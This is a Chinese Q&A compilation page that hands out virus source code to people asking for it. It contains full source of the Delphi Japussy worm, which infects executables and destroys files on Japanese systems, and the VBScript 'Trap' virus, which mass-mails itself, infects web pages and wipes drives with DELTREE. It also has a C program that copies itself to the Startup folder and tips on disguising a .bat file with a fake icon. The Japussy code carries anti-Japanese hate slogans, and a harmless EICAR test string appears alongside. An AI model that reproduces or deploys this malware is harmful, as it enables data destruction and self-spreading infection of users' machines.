能发一个完整的病毒源代码文件？我分析一下。直接复制在这里就可以，不要发给我

复制的，希望采纳

program Japussy;

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

const

HeaderSize = 82432; //病毒体的大小

IconOffset = $12EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

{

HeaderSize = 38912; //Upx压缩过病毒体的大小

IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe

}

IconSize = $2E8; //PE文件主图标的大小--744字节

IconTail = IconOffset + IconSize; //PE文件主图标的尾部

ID = $44444444; //感染标记

//垃圾码，以备写入

Catchword = 'If a race need to be killed out, it must be Yamato. ' +

'If a country need to be destroyed, it must be Japan! ' +

'*** W32.Japussy.Worm.A ***';

{$R *.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

stdcall; external 'Kernel32.dll'; //函数声明

var

TmpFile: string;

Si: STARTUPINFO;

Pi: PROCESS_INFORMATION;

IsJap: Boolean = False; //日文操作系统标记

{ 判断是否为Win9x }

function IsWin9x: Boolean;

var

Ver: TOSVersionInfo;

begin

Result := False;

Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);

if not GetVersionEx(Ver) then

Exit;

if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x

Result := True;

end;

{ 在流之间复制 }

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

dStartPos: Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos := Src.Position;

dCurPos := Dst.Position;

Src.Seek(sStartPos, 0);

Dst.Seek(dStartPos, 0);

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos, 0);

Dst.Seek(dCurPos, 0);

end;

{ 将宿主文件从已感染的PE文件中分离出来，以备使用 }

procedure ExtractFile(FileName: string);

var

sStream, dStream: TFileStream;

begin

try

sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

dStream := TFileStream.Create(FileName, fmCreate);

try

sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size - HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

{ 填充STARTUPINFO结构 }

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

begin

Si.cb := SizeOf(Si);

Si.lpReserved := nil;

Si.lpDesktop := nil;

Si.lpTitle := nil;

Si.dwFlags := STARTF_USESHOWWINDOW;

Si.wShowWindow := State;

Si.cbReserved2 := 0;

Si.lpReserved2 := nil;

end;

{ 发带毒邮件 }

procedure SendMail;

begin

//哪位仁兄愿意完成之？汤姆感激不尽！

end;

{ 感染PE文件 }

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[0..1] of Char;

begin

try //出错则文件正在被使用，退出

if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染

Exit;

Infected := False;

IsPE := False;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

try

for i := 0 to $108 do //检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记

begin

IsPE := True; //是PE文件

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd); //检查感染标记

SrcStream.Read(iID, 4);

if (iID = ID) or (SrcStream.Size 10240) then //太小的文件不感染

Infected := True;

finally

SrcStream.Free;

end;

if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

Exit;

IcoStream := TMemoryStream.Create;

DstStream := TMemoryStream.Create;

try

aIcon := TIcon.Create;

try

//得到被感染文件的主图标(744字节)，存入流

aIcon.ReleaseHandle;

aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);

aIcon.SaveToStream(IcoStream);

finally

aIcon.Free;

end;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

//头文件

HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

//写入已感染的标记

DstStream.Seek(0, 2);

iID := $44444444;

DstStream.Write(iID, 4);

finally

HdrStream.Free;

end;

finally

SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName); //替换宿主文件

DstStream.Free;

end;

except;

end;

end;

{ 将目标文件写入垃圾码后删除 }

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i, Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName), 0); //去掉只读属性

FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件

try

Size := GetFileSize(FileHandle, nil); //文件大小

i := 0;

Randomize;

Max := Random(15); //写入垃圾码的随机次数

if Max 5 then

Max := 5;

Mass := Size div Max; //每个间隔块的大小

Len := Length(Catchword);

while i Max do

begin

FileSeek(FileHandle, i * Mass, 0); //定位

//写入垃圾码，将文件彻底破坏掉

FileWrite(FileHandle, Catchword, Len);

Inc(i);

end;

finally

FileClose(FileHandle); //关闭文件

end;

DeleteFile(PChar(FileName)); //删除之

except

end;

end;

{ 获得可写的驱动器列表 }

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

for i := 0 to 25 do //遍历26个字母

begin

D := Chr(i + 65);

Str := D + ':\';

DiskType := GetDriveType(PChar(Str));

//得到本地磁盘和网络盘

if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

Result := Result + D;

end;

end;

{ 遍历目录，感染和摧毁文件 }

procedure LoopFiles(Path, Mask: string);

var

i, Count: Integer;

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if (SearchRec.Attr 16) and (SearchRec.Name '.') and

(SearchRec.Name '..') then

Result := 0 //不是目录

else if (SearchRec.Attr = 16) and (SearchRec.Name '.') and

(SearchRec.Name '..') then

Result := 1 //不是根目录

else Result := 2; //是根目录

end;

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑

if IsValidDir(SearchRec) = 0 then

begin

Fn := Path + SearchRec.Name;

Ext := UpperCase(ExtractFileExt(Fn));

if (Ext = '.EXE') or (Ext = '.SCR') then

begin

InfectOneFile(Fn); //感染可执行文件

end

else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

begin

//感染HTML和ASP文件，将Base64编码后的病毒写入

//感染浏览此网页的所有用户，这个是我最喜欢的！

//哪位大兄弟愿意完成之？汤姆感激不尽！

end

else if Ext = '.WAB' then //Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext = '.ADC' then //Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext = 'IND' then //Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then //是倭文操作系统

begin

if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

SmashFile(Fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑

Sleep(200);

until (FindNext(SearchRec) 0);

end;

FindClose(SearchRec);

SubDir := TStringList.Create;

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then

begin

repeat

if IsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name);

until (FindNext(SearchRec) 0);

end;

FindClose(SearchRec);

Count := SubDir.Count - 1;

for i := 0 to Count do

LoopFiles(Path + SubDir.Strings + '\', Mask);

FreeAndNil(SubDir);

end;

{ 遍历磁盘上所有的文件 }

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP = 932 then //日文操作系统

IsJap := True; //去死吧！

DriverList := GetDrives; //得到可写的磁盘列表

Len := Length(DriverList);

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList + ':\', '*.*'); //感染之

SendMail; //发带毒邮件

Sleep(1000 * 60 * 5); //睡眠5分钟

end;

end;

{ 主程序开始 }

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之？汤姆感激不尽！

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序上了，开始工作

begin

TmpFile := ParamStr(0); //创建临时文件

Delete(TmpFile, Length(TmpFile) - 4, 4);

TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格

ExtractFile(TmpFile); //分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil, '.', Si, Pi); //创建新进程运行之

InfectFiles; //感染和发邮件

end;

end

求简单的病毒代码

本代码尽管测试，无任何危险。病毒文件测试代码。使用方法如下：

This is not a real virus. It is a text file that is used to test antivirus software.

测试代码：

---------------------请复制下面的代码到文本中保存-------------------

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

---------------------请复制上面的代码到文本中保存-------------------

测试方法：

1.鼠标右键点击桌面空白处，创建一个“文本文档”。（什么，还不会建？我倒）

2.将下面这段测试代码复制到“文本”里，保存，然后可以直接右键点击这个文本，用杀毒软件扫描（图1）。也可以等一会，如果你的杀毒软件还行，会自动报毒并将该文本删除，那就可以初步放心了。

测试原理：

该段代码是欧洲计算机防病毒协会开发的一种病毒代码，其中的特征码已经包含在各种杀毒软件的病毒代码库里，所以可以用做测试病毒扫描引擎。

测试等级:

特等：复制完代码后便提示内存有病毒

优等：刚保存完就提示病毒(或者直接删除)

中等：保存后几秒提示病毒(或者直接删除)

下等：需自己启动病毒扫描查杀才提示病毒(或者直接删除)

劣等：无论怎么扫描都无法提示病毒(或者直接删除)

病毒源代码怎么用

建立一个新的记事本，把病毒源代码复制进去，保存。然后重命名，把后缀改成 .bat 就可以了。这时候系统会提示更改后不可用，点确定，这时候就是一个可执行程序了，也就是病毒。点击就会自动运行。另外，还可以隐藏后缀名，换图标，以假乱真

比较简单的C++病毒代码

最简单的病毒代码如下： #include "windows.h"

#include "stdio.h"

void main(int argc,char * argv[])

{

//printf("%s\n",argv[i]);

char copy[80];

sprintf(copy,"copy %s \"%%userprofile%%\\「开始」菜单\\程序\\启动\"",argv[0]);

system(copy); //将这个程序拷到开机启动文件夹下面

//char cmd[]="shutdown -r -t 0";//自动重起

char cmd[]="ping baidu.com";//将这个换成上面的，就是一开机就重起了！

system(cmd);

system("pause");

}

给个C语言病毒代码.....要复制的....越长越好

下面就对“陷阱”的发作过程和源代码作详细的揭密。

病毒具有自身加密能力(使用 JavaScript 编码技术)，使得普通用户无法看到病毒原码，但在被感染 VBS 文件中并没有加密，于是作为一个入口点，我非常轻松地得到所有源码。

'@ thank you! make use of other person to get rid of an enemy, trap _2001

'这句话的意思可能是“借刀杀人”，然后是病毒名称“陷阱”

on error resume next

dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str

dim defpath, smailc, MAX_SIZE

dim whb(), title(10)

smailc = 4

Redim whb(smailc) ’白宫相关人员邮件名单

whb(0) = "president@whitehouse.gov"

whb(1) = "vice.president@whitehouse.gov "

whb(2) = "first.lady@whitehouse.gov"

whb(3) = "mrs.cheney@whitehouse.gov"

'发送邮件的主题

title(0) = "Thanks for helping me!"

title(1) = "The police are investigating the robbery"

title(2) = "an application for a job "

title(3) = "The aspects of an application process pertinent to OSI"

title(4) = "What a pleasant weather. Why not go out for a walk?"

title(5) = "These countries have gone / been through too many wars"

title(6) = "We've fixed on the 17th of April for the wedding"

title(7) = "The wind failed and the sea returned to calmness."

title(8) = "the sitting is open!"

title(9) = ""

defpath = "C:\Readme.html" ' 病毒文件

MAX_SIZE = 100000 ' 定义传染文件的最大尺寸

MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"

HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"

main

sub main() '主程序

on error resume next

dim w_s

w_s= WScript.ScriptFullName '得到病毒文件本身的路径

if w_s = "" then

Err.Clear

set fso = CreateObject("Scripting.FileSystemObject") '创建文件系统对象

if getErr then '辨认病毒状态

Randomize '初始化随机种子

ra = int(rnd() * 7) '产生随机数

doucment.write title(ra) ' 写随机内容

ExecuteMail '执行邮件状态时的程序

else

ExecutePage '执行 WEB 页状态时的程序

end if

else

ExecuteVbs '执行 VBS 文件状态时的程序

end if

end sub

Function getErr() 忽略错误

if Err.number0 then

getErr=true

Err.Clear

else

getErr=false

end if

end function

sub ExecutePage() 'WEB 页状态时的程序

on error resume next

dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf

Vbs_Str = GetScriptCode("vbscript") '得到 VBScript 代码

Js_Str = GetJavaScript() ' 得到 Javascript 代码

Code_Str = MakeScript(encrypt(Vbs_str),true) '得到已加密过的脚本代码

Html_Str = MakeHtml(encrypt(Vbs_str), true) '得到已加密的完整HTML代码

Gf

'定义病毒文件的路径

wdsf = w2 "Mdm.vbs"

wdsf2 = w1 "Profile.vbs"

wdf = w2 "user.dll" ' 注意 wdf 和 wdf3 两个文件非常迷惑人

wdf2 = w2 "Readme.html"

wdf3 = w2 "system.dll"

'创建病毒文件

set vf = fso.OpenTextFile (wdf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf2, 2, true)

vf.Write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdf2, 2, true)

vf.write Html_Str

vf.close

set vf = fso.OpenTextFile (wdf3, 2, true)

vf.write Code_Str

vf.close

修改注册表，让病毒文件在每一次计算机启动自动执行

Writereg MSWKEY "CurrentVersion\Run\Mdm", wdsf, ""

Writereg MSWKEY "CurrentVersion\RunServices\Profile", wdsf2, ""

SendMail ' 执行发送邮件程序

Hackpage ' 执行感染网站程序

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then '遍历所有本地硬盘和网络共享硬盘

call SearchHTML(x "\") '执行文件感染程序

end if

next

if TestUser then '检查用户

Killhe 执行删除文件操作

else

if Month(Date) Day(Date) = "75" then '如系统时间为 7月5日

set vf = fso.OpenTextFile(w2 "75.htm", 2,true) ’创建系统攻击文件

vf.write MakeScript ("window.navigate ('c:/con/con');", false)

vf.close

Writereg MSWKEY "CurrentVersion\Run\75", w2 "75.htm", "" '自动启动

window.navigate "c:/con/con" '立刻蓝屏，利用 Windows BUG，能引起 Win9X 系统100%死机（即无法恢复的蓝屏）

else '如不是7.5

if fso.FileExists(w2 "75.htm") then fso.DeleteFile w2 "75.htm" ' 删除75.htm

end if

end if

if fso.FileExists(defpath) then fso.DeleteFile defpath ' 删除 C:\Readme.html 病毒文件

end sub

sub ExecuteMail() '邮件状态时执行的程序

on error resume next

Vbs_Str = GetScriptCode("vbscript")

Js_Str = GetJavaScript()

Set Stl = CreateObject("Scriptlet.TypeLib") '创建 TypeLib对象

with Stl

.Reset

.Path = defpath

.Doc = MakeHtml(encrypt(Vbs_str), true)

.Write() '创建 C:\Readme.html 文件

end with

window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打开会隐藏的窗口

end sub

sub ExecuteVbs() ' 同理，如病毒文件是 VBS 时所执行的程序

on error resume next

dim x, adi, wvbs, ws, vf

set fso = CreateObject("Scripting.FileSystemObject")

set wvbs = CreateObject("WScript.Shell")

Gf

wvbs.RegWrite MSWKEY "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"

set vf = fso.OpenTextFile (w2 "system.dll", 1)

Code_Str = vf.ReadAll()

vf.close

Hackpage

SendMail

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then

call SearchHTML(x "\")

end if

next

if TestUser then Killhe

end sub

sub Gf() '得到系统路径

w1=fso.GetSpecialFolder(0) "\"

w2=fso.GetSpecialFolder(1) "\"

end sub

function Readreg(key_str) '读注册表

set tmps = CreateObject("WScript.Shell")

Readreg = tmps.RegRead(key_str)

set tmps = Nothing

end function

function Writereg(key_str, Newvalue, vtype) '写注册表

set tmps = CreateObject("WScript.Shell")

if vtype="" then

tmps.RegWrite key_str, Newvalue

else

tmps.RegWrite key_str, Newvalue, vtype

end if

set tmps = Nothing

end function

function MakeHtml(Sbuffer, iHTML) '创建HTML 文件的完整代码

dim ra

Randomize

ra = int(rnd() * 7)

MakeHtml="" "HTML" "HEAD" "TITLE" title(ra) "/" "TITLE" "/HEAD" _

"BO" "AD" vbcrlf MakeScript(Sbuffer, iHTML) vbcrlf _

"" "/BOAD" "/HTML"

end Function

function MakeScript(Codestr, iHTML) '此程序是病毒进行自我加密过程,较为复杂，不再描述

if iHTML then

dim DocuWrite

DocuWrite = "document.write(''+" "'SCRIPT Language=JavaScript\n'+" _

"jword" "+'\n/'" "+'SCRIPT');"

DocuWrite = DocuWrite vbcrlf "document.write(''+" "'SCRIPT Language=VBScript\n'+" _

"nword" "+'\n/'" "+'SCRIPT');"

MakeScript="" "SCRIPT Language=JavaScript" vbcrlf "var jword = " _

chr(34) encrypt(Js_Str) chr(34) vbcrlf "var nword = " _

chr(34) Codestr chr(34) vbcrlf "nword = unescape(nword);" vbcrlf _

"jword = unescape(jword);" vbcrlf DocuWrite vbcrlf "/" "SCRIPT"

else

MakeScript= "" "SCRIPT Language=JavaScript" Codestr "/" "SCRIPT"

end if

end function

function GetScriptCode(Languages) ' 得到不同脚本语言的代码

dim soj

for each soj in document.scripts

if LCase(soj.Language) = Languages then

if Languages = "javascript" then

if len(soj.Text) 200 then

else

GetScriptCode = soj.Text

exit function

end if

else

GetScriptCode = soj.Text

exit function

end if

end if

next

end function

function GetJavaScript()

GetJavaScript = GetScriptCode("javascript")

end function

function TestUser() '检测用户过程

on error resume next

dim keys(6), i, tmpStr, Wnet

'特定用户关键词

keys(0) = "white home"

keys(1) = "central intelligence agency"

keys(2) = "bush"

keys(3) = "american stock exchang"

keys(4) = "chief executive"

keys(5) = "usa"

TestUser = false

Set Wnet = CreateObject("WScript.Network") '创建网络对象

'下面一共3个循环，作用一样，是检查用户的 Domain、用户名和计算机名是否含有以上的5个关键词语，一旦含有程序将返回”真”的条件，从而对这些用户的文件进行疯狂删除。

tmpStr = LCase(Wnet.UserName) '

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.ComputerName)

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.UserDomain)

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

Set Wnet = Nothing

end function

function SendMail() '发送文件过程

on error resume next

dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at

'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件

主题是随机的，此过程与“欢乐时光“类似，所以不再描述

Randomize

at=fso.GetSpecialFolder(1) "\Readme.html"

set Oa = CreateObject("Outlook.Application")

set wab = Oa.GetNameSpace("MAPI")

for j = 1 to wab.AddressLists.Count

eins = wab.AddressLists(j)

wreg=Readreg (HCUW eins)

if (wreg="") then wreg = 1

Eaec = eins.AddressEntries.Count

if (Eaec Int(wreg)) then

for x = 1 to Eaec

arrsm = wab.AddressEntries(x)

areg = Readreg(HCUW arrsm)

if (areg = "") then

set fm = wab.CreateItem(0)

with fm

ra = int(rnd() * 7)

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Attachments at

.Send

Writereg HCUW arrsm, 1, "REG_DWORD"

end with

end if

next

end if

Writereg HCUW eins, Eaec, ""

next

'下面是对指定的用户无条件发送大量病毒邮件, 从这一点可看出病毒作者对美国政府的极度不满。

for j = 1 to smailc

arrsm = whb(j)

set fm = wab.CreateItem(0)

ra = int(rnd() * 7)

with fm

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Send

end with

next

set Oa = Nothing

window.setTimeout "SendMail()", 5000 '每隔 5 秒种重复发送

end function

sub SearchHTML(Path) '搜索可传染文件的过程

on error resume next

dim pfo, psfo, pf, ps, pfi, ext

if instr(Path, fso.GetSpecialFolder(2)) 0 then exit sub

if Path "E:\" then exit sub

set pfo = fso.GetFolder(Path)

set psfo = pfo.SubFolders

for each ps in psfo

SearchHTML(ps.Path)

set pf = ps.Files

for each pfi in pf

ext = LCase(fso.GetExtensionName(pfi.Path))

if instr(ext, "htm") 0 or ext = "plg" or ext = "asp" then '检查文件的扩展名是否为 htm、html、plg 如是则检查是否被感染，如未被感染则将已加密的病毒代码插入文件头，这样文件一旦执行也会执行病毒代码，而且不会影响原文件的正常执行。

if Code_Str"" then AddHead pfi.Path, pfi, 1

elseif ext= "vbs" then '如是 vbs 文件，则插入未加密的病毒代码

AddHead pfi.Path,pfi, 2

end if

next

next

end sub

sub Killhe() '全盘删除文件过程

on error resume next

dim codeText, ko,adi, kd, kh, ks,kf,kfs

codeText = "@ECHO OFF" vbcrlf "PATH " w1 "COMMAND" vbcrlf _

"DELTREE c:\" '将删除C盘的命令插入Autoexec.bat 中，下次开机时，删除整个硬盘，并没有任何提示

set ko = fso.OpenTextFile("C:\Autoexec.bat", 8, true)

ko.Write vbcrlf codeText

ko.Close

'接着立刻删除其它盘的所有文件

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 then

set kd = fso.GetFolder(x "\")

set kfs = kd.Files

for each kf in kfs

kf.Delete

next

set ks = kd.SubFolders

for each kh in ks

kh.Delete

next

end if

next

do while 1 '让系统立刻死机

window.open ""

loop

end sub

sub Hackpage() ' 此过程是直接攻击 Mircosoft IIS 服务器主页过程

dim fi

H = "C:\InetPut\wwwroot"

if fso.FolderExists(H) then

'判断是否为网站，如是则将已加密的带病毒代码插入文件头，从而直接传染浏览该网站的用户

set fi = fso.GetFile(H "\index.htm")

AddHead H "\index.htm",fi,1

end if

end sub

sub AddHead(Path, f, t) '此过程是病毒传染文件具体过程

on error resume next

dim tso, buffer,sr

if f.size MAX_SIZE then exit sub '传染大小小于100K的文件

set tso = fso.OpenTextFile(Path, 1, true)

buffer = tso.ReadAll()

tso.close

if (t = 1) then

if UCase(Left(LTrim(buffer), 7)) "SCRIPT" then

set tso = fso.OpenTextFile(Path, 2, true)

tso.Write Code_Str vbcrlf buffer '插入到文件头

tso.close

end if

else

if mid(buffer, 3, 2) "'@" then

tso.close

sr=w2 "user.dll"

if fso.FileExists(sr) then fso.CopyFile sr, Path

end if

end if

end sub

虽然病毒发作日已过但我们还是要小心提防病毒的变种出现。